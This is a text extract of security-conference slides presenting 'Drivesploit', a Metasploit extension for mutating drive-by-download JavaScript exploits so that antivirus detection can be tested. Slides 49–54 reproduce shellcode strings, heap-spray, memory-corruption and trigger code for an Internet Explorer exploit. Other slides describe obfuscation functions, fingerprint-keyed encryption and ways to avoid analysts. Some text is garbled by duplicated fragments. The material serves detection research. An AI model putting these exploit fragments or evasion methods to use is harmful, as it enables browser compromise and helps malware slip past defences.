  • 20. (1) Legitimate, injectable sites URL Generators Landing Site Landing Site  May-Ongoing:/ DNF666 mass SQ ay O go Exploits droppers 666 ass SQL g Exploits / droppers injections Exploit Server  May-June: Shared hosting compromise, Malware GoDaddy, RackSpace, GoDaddy RackSpace Network Solutions, BlueHost, DreamHost Malware Server  Continuous targeted attacks 20
  • 21. (1) Legitimate, vulnerable sites URL Generators Landing Site Landing Site  Mass SQL injections Exploits / droppers Exploits / droppers  Mass hosting compromises Exploit Server  Directly inside HTML / PHP / ASP Malware  Hidden inside WorldPress files  Hidden inside DB Malware Server  Hidden inside DB stored procedures 21
  • 22. (2) Man-in-the-Middle WAN LAN URL Generators Landing Site Landing Site  No tampering of website p Exploits / droppers g Exploits / droppers  LAN: ARP spoofing via ZXARPS and other Exploit Server tools Malware  WAN: March 2009, middle of route 2009 route, tw.msn.com, taiwan.cnet.com, others Malware Server Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778 22
  • 25. Live demo recap Injected javascript in digg.com
  • 26. Live demo recap 1. Inject javascript into digg.com j j p gg 2. Javascript loads iframe from our domain zcrack.org 3. Metasploit (drivesploit) is running on zcrack.org, zcrack org serves ie peers exploit 4. Bypasses AV 5. IE visitor attacked, IE crashes, meterpreter starts, jumps process to notepad.exe notepad exe 6. We have a shell :)
  • 27. MOTIVATION We provide solutions that monitors p websites and detect malicious contents 24 7 t t 24x7 We use multiple behavior-, heuristic-, p , , and signature-based technologies 27
  • 28. MOTIVATION Most technologies are developed on our own, BUT, We also integrate anti-virus, whose licenses are $expensive$ 28
  • 29. MOTIVATION We spend a lot of time testing our own technologies, and selecting anti-virus technologies t h l gi The key is: how good are we (and them) at detecting NEW drive-by downloads 29
  • 30. MOTIVATION We need a good framework to help us g p replicate, manipulate, and mutate exploits found in the wild --into NEW derivatives 30
  • 31. DRIVESPLOIT IS BORN ON TOP OF METASPLOIT 31
  • 32. INITIAL FINDINGS ANTIVIRUS CAPABILITIES DIFFER GREATLY! DESKTOP AND API VERSIONS DIFFER GREATLY IN PERFORMANCE COST != PERFORMANCE
  • 33. Antivirus vs. Drive-bys URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 33
  • 34. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server Controller 34
  • 35. Antivirus vs. Drive-bys JAVASCRIPT URL Generators Landing Site Landing Site JAVASCRIPT Exploits / droppers Exploits / droppers JAVASCRIPT Exploit Server Malware PE BINARY PE BINARY Malware Server We will detect  We will detect Controller 35 this part!!
  • 36. Why we can’t rely on PE detection • Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on – Attack reported to the hosting / registrar – Domain banned by ISPs – Purchased duration was over • We want to detect the injection so our customers can remove it • Actually statically detecting javascript exploits is Actually, quite difficult 36
  • 37. THE TAO: ECMA-SCRIPTS ECMA SCRIPTS JAVASCRIPT VBSCRIPT ADOBE JS ACTIONSCRIPT 37
  • 38. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Malware Server Controller 38
  • 39. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Malware Controller 39
  • 40. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server Controller 40
  • 41. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers Exploit Server (METASPLOT) Controller 41
  • 42. JAVASCRIPT!! (ECMA-SCRIPT) URL Generators Landing Site Landing Site Exploits / droppers Exploits / droppers PAYLOAD Exploit Server meterpreter (METASPLOT) (memory injection) Controller 42
  • 43. Drive-By wants to… • Avoid detection at the victim's desktop • Avoid detection by UTM/gateways • Avoid detection by b automated t t d monitors • Live for as long as possible ibl
  • 44. Drive-By wants to… CONCLUSION: Reduce exposure: Serve SELECTIVELY Avoid detection and analysis: Mutate well
  • 45. Serve Selectively HTTP LEVEL: Serve only to: • Fresh IPs (serve once per IP) set HTTP::client::onlyonce true • Particular referer (eg Gumblar) (eg. set HTTP::referer google.com • Particular agent string (vulnerable browser) set HTTP::agent::MSIE 7.0 • Black list set HTTP::client::blacklist false
  • 46. SCRIPT MUTATION For exploit For F payload l d 46
  • 47. The goal is not to "obfuscate"...
  • 48. JAVASCRIPT EXPLOIT DISEC Shellcode M Corrupt Heapspray Trigger gg
  • 49. JAVASCRIPT EXPLOIT DISEC Shellcode <script>var shellraw =  "%u7679%u4673%u757b%u924e%u 66b9%ub441%u018d%u7df9%u241 c%ud631%u40b7%ueb11%u043d%u M Corrupt be97%u212c%u05e1%u8335%u42fc %ub893%u227f%u98d4%u484b%u8 c90%u13e0%uf8d3%u7aba%u7278 %u2034%u49f5%u259f%u9137%u3 Heapspray 39b%u1dd5%ub1b0%u3f99%u2f43 %u3cb6%ub2a8%ub30c%u4714%u3 d7b%ue138%uf803%u66b2%u97b9 d7b% 138% f803% 66b2% 97b9 %u9335%u767a%ub805%ue201%u4 Trigger gg a2f%u85a8%u7eeb%uf93b%u414f% u257d%u78bf%u2c43%u7f99%ubb2 d%ub098%ub342%u918d%u3fb2%u 704a%u7147%u7f74%u3073%u77f9 %ubb40
  • 50. JAVASCRIPT EXPLOIT DISEC Shellcode var j_object =  document.createElement('body'); j_object.addBehavior('#default#user M Corrupt Data'); document.appendChild(j_object); Heapspray try { for (counter=0; counter<10;  counter++) { t ){ j_object.setAttribute('s',window);} Trigger gg }  catch(e){ }window.status+= ;} catch(e){ }window status+ '';}
  • 51. JAVASCRIPT EXPLOIT DISEC Shellcode var counter;var shellcode =  unescape(shellraw); var memory = new Array();var Buffer Ovf slackspace = 0x86000‐ (shellcode.length*2); var nops =  unescape("%u0c0c%u0c0c"); Heapspray while(nops.length<slackspace/2) {  nops+=nops; }var fillbl k =  } fillblock nops.substring(0,slackspace/2); Trigger gg delete nops; for(counter=0; counter<270;  counter++) {memory[counter] =  fillblock + fillblock + shellcode; + fillblock + shellcode;
  • 52. JAVASCRIPT EXPLOIT DISEC Shellcode <button id j_id <button id='j id'  onclick='bootstrapper();'  style='display:none'></butt M Corrupt on> … Heapspray … … Trigger gg document.getElementById( 'j_id').onclick();
  • 53. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  • 54. Dissecting Drive-By Downloads Exploit! Page + Browser Page + Browser Exploit Payload =  Exploit Server downloader d l d <script>var sc = unescape(" %u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805 %uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2 %u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053 %ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8 var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <  200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){  e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = "";  window.setInterval(ev2, 50); } function ev2(){ p = "  54
  • 55. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  • 56. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Form F
  • 57. JAVASCRIPT EXPLOIT DISEC Shellcode OBFUSCATED M Corrupt BLOB  Mutate Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
  • 59. 1. Javascript Random Variable Auto Replacement • Accepts a piece of javascript p p j p • Parses the javascript according to grammer • Auto replaces all variable names and function names with random names • Passes back: a) the new javascript b) a vector of old-new name mappings ) pp g
  • 60. 1. Javascript Random Variable Auto Replacement randomized = Rex::Exploitation::DriveSploit::obfusca tejs(js, j (j , Rex::Exploitation::DriveSploit::AUTO_R ANDOM_VARS)
  • 61. 2. Javascript Concat String Obfuscation Obf ti arr = Rex::Exploitation::DriveSploit.obfusca tejs(shellcode, t j ( h ll d Rex::Exploitation::DriveSploit::STRING CONCAT) shellcode script = arr[0] h ll d i t [0] shellcode_var = arr[1]
  • 62. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A1 = "%u7"; A3 = "u4673%"; A2 = "679%"; 679% ; A4 = "u75"; u75 ; A3 = "u4673%"; A1 = "%u7"; A4 = "u75"; u75 ; A5 = "7%u92"; 7%u92 ; A5 = "7%u92"; A2 = "679%"; A6 = "4e"; A6 = "4e";
  • 63. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%"; A4 = "u75"; u75 ; B1 = A1+A2; A1 = "%u7"; B2 = A3+A4; ; Layer 2 ay A5 = "7%u92"; 7%u92 ; B3 = A5+A6; A2 = "679%"; A6 = "4e";
  • 64. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 B1 = A1+A2; B2 = A1+A2; B2 = A3+A4; ; B3 = A5+A6; ; B3 = A5+A6; B1 = A3+A4;
  • 65. 2. Javascript Concat String Obfuscation Obf ti %u7679%u4673%u757%u924e % 7679% 4673% 757% 924 A3 = "u4673%”;A4 = "u75”; " 4673%” A4 " 75” A1 = "%u7"; A5 = "7%u92”;A2 = "679%"; A6 = "4e"; B2 = A1+A2; 4e ; B1 = A3+A4;B3 = A5+A6;C1=B1+B2; D1=C1+B3; // variable names are randomized
  • 66. 3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) shellcode = insertret[0] random insertion string = insertret[1]
  • 67. 3. Javascript Random Text Insertion insertret = Rex::Exploitation::DriveSploit.getInse rtion(shellcode, 4, 6, 10) # insert a fixed 6-character random # string, for every 4-8 characters returns a) a piece of javascript containing the injected string b) Javascript variable name containing the reverted, original string
  • 68. 4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 )
  • 69. 4. Numeric Literal Mutation slackspace = p Rex::Exploitation::Drivespl oit.obfuscateNumber(0x86000 oit obfuscateNumber(0x86000 ) ( 6 ) (56 6 96) (3 ) 8 (333 ) (246*2)+(5676*96)+(34*4)+8+(3332*1)
  • 70. 4. Numeric Literal Mutation slackspace = 0x86000 slackspace = l k (246*2)+(5676*96)+(34*4)+8+ (3332*1)
  • 71. Trigger Prevention Shellcode OBFUSCATED M Corrupt BLOB  Heapspray DE‐ Start Trigger gg OBFUSCATOR Primitive Obfuscated Form F Prevent Form F
  • 72. Trigger prevention • <div onload • <img onload • var a=1; var b=0; do { useless code; } while (a==b); (a b); • Fingerprinting-based encryption
  • 75. RANDOM VARS: 16/42 (某採!)
  • 78. ROUGHLY 6/17 ANTI-VIRUS ANTI VIRUS DETECTS BASED ON SHELLCODE (FOR THIS EXPLOIT)
  • 83. ANTIVIRUS DESKTOP VERSION • Can monitor host environment – Hook into browsers – Easier to get raw form of exploit • Behavior analysis – Buffer overflow behavior – Download to file behavior Download-to-file
  • 84. AntiVirus Desktop Kung Fu To Ag Sc Aa Ky Plain ✖ ✖ ✔ ✔ ✔ Random variables ✖ ✖ ✔ ✔ ✔ Split literals ✖ ✖ ✔ ✔ ✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ Concat SC ✖ ✖ ✔ ✔ ✔ Concat CODE ✖ ✔ ✖ ✔ ✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔
  • 85. AntiVirus Desktop Kung Fu To Ag Sc Aa Ky M Plain ✖ ✖ ✔ ✔ ✔ ✔✔ Random variables ✖ ✖ ✔ ✔ ✔ ✔✔ Split literals ✖ ✖ ✔ ✔ ✔ ✔✔ Injection SC Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat SC ✖ ✖ ✔ ✔ ✔ ✖✔ Concat CODE ✖ ✔ ✖ ✔ ✔ ✖✔ Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ ✖✔ Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔ ✖✔
  • 89. 89
  • 90. 90
  • 91. 91
  • 92. 92
  • 93. Browser Feature Table IE7 FF Safari Opera Chrome Is_contextmenu_event_supported Is contextmenu event supported True True True False True String_prototype_replace_ignore_functions False False True (2.0.2) False False Is_ES5_strict_mode_supported False False False False False Array_prototype_slice_can_convert_to_array Array prototype slice can convert to array False True True True True Getelementsbytagname_returns_comment_nodes True False False False False Is_element_tagname_uppercased True True True True True Is_canvas_element_supported False True True True True Is_DOMFocusIn_supported False False True True True Is_CSS_boder_radius_supported False True True False True Function_identified_leaks_onto_enclosing_scope True False False False False Script_element_rejects_textnode_appending True False False False False Is_contextmenu_event_supported True True True False True Is_position_fixed_supported False True True False True Computed_style_return_static_positioned_element False False False True False 93
  • 94. 5. Fingerprinting-Based Encryption Summary • "This exploit works only for IE6" This IE6 • "Give me an encrypted version of my javascript exploit” j i t l it” • "Give me javascript to generate the decoding key" • "The key is only correctly generated if the y y yg javascript is run under IE6" 94
  • 95. 5. Fingerprinting-Based Encryption Summary A=Check1(); B=Check3(); C=Check4(); D Check6(); D=Check6(); E=Check8(); F=Check9(); (); G=Check12(); H=Check14(); 95
  • 96. 5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); F=Check9(); (); F=Check14(); (); G=Check12(); G=Check3(); H=Check14(); H=Check9(); 96
  • 97. 5. Fingerprinting-Based Encryption Summary A=Check1(); A=Check6(); One‐time key B=Check3(); B=Check12(); C=Check4(); C=Check8(); D Check6(); D=Check6(); D Check1(); D=Check1(); E=Check8(); E=Check4(); Encrypt F=Check9(); (); F=Check14(); (); javascript G=Check12(); G=Check3(); exploit l H=Check14(); H=Check9(); Generate decoding 97 javascript
  • 98. Why not Anti-Virus? • AV is to install on desktops / notebooks p • Complicated normal behaviors • Strict resource constraints • Therefore, AV and gateway vendors rely on: – Signature-based pattern matching technologies – LIGHTWEIGHT and ACCURATE • Why can’t such technology used to detect drive-by-downloads? 98
  • 99. Javascripts are not harmful to th t the environment… i t 99
  • 100. … so they are usually not reused AV no good because drive-by-downloads are in: g y • Disposable Javascript • Disposable PDF Adobe JS • Disposable Flash actionscript • All ECMA- scripts you don't usually reuse them… 100
  • 101. Javascript Packing Is a Norm • Packing is widely used by legitimate code! – To protect javascript source code – To reduce javascript size • Google Closure Compiler – http //code google com/clos e/compile / http://code.google.com/closure/compiler/ • Yahoo Javascript Packer (YUI Compressor) – http://developer.yahoo.com/yui/compressor/ p // p y /y / p / • Advanced HTML Protector – http://www.creabit.com/htmlprotect/ • D Dean Edwards’ Packer Ed d ’P k – http://dean.edwards.name/packer/ • Online JS Obfuscator – http://www.iwebtool.com/html_encrypter • http://www.cha88.cn/safe/fromCharCode.php 101
  • 102. … OK so AV doesn t work (that well)… doesn’t well) How about behavior-based approaches? 102
  • 103. Defeating Behavior Analysis 1. Use VBScript – Exploits in VBScript – URL generators in VBScript – Exploits in / generated by VBScript – May defeat SpiderMonkey et al (Rhino, JSunPack, etc) 2. Don’t serve to detectors – You can’t detect what you don’t have – Serve to each IP only once – Detect agent strings – Collect robot IPs—Google, Yahoo, security vendors 103
  • 104. Defeating Behavior Analysis 3. Fingerprint-based encryption g p yp 3. Little b effective techniques l but ff h – Sleep(30000); //using SetTimeout – Timelock puzzles 104
  • 105. Future Work • Randomly chop up scripts and split into individual f l d d l files • Generating VBscript instead of javascript g p j p • Encrypting using data existing outside of HTML – HTTP headers
  • 106. Discussion • The Panopticlick experiment by p p y Eckersley of EFF – 94.2% of "typical desktop browsers” are unique yp p q • Can fingerprinting-based encryption be integrated with this type of individual fingerprinting, to prevent detection and analysis of target attacks?
  • 107. THANK YOU! wayne@armorize.com @waynehuang @drivesploit http://www.drivesploit.org http://www drivesploit org Credits: wayne huang, fyodor yarochkin, g antonio rohman fernandez Special thanks to: Benson Wu, Jeremy Chiu, Kuon Ding Felix, Cola Ding, Felix
  • 108. References • James Lee, Using guided missles in drive-bys http://www.slideshare.net/egypt/using guided missiles in http://www slideshare net/egypt/using-guided-missiles-in- drivebys-automatic-browser-fingerprinting-and-exploitation-with- the-metasploit-frameworks-browser-autopwn • Sebastian Porst, How to really obfuscate your , y y PDF malware http://www.slideshare.net/cblichmann/how- to-really-obfuscate-your-pdf-malware • Jeremy Chiu, 0box analyzer: afterdark runtime forensics for automated malware analysis and clustering http://www.slideshare.net/wayne_armorize/0-box-analyzer- afterdark-runtime-forensics-for-automated-malware-analysis-and- ft d k ti f i f t t d l l i d clustering-2 • HeapLib support added to Metasploit 3 http://blog.metasploit.com/2007/04/heaplib-support-added-to- http://blog metasploit com/2007/04/heaplib support added to metasploit-3.html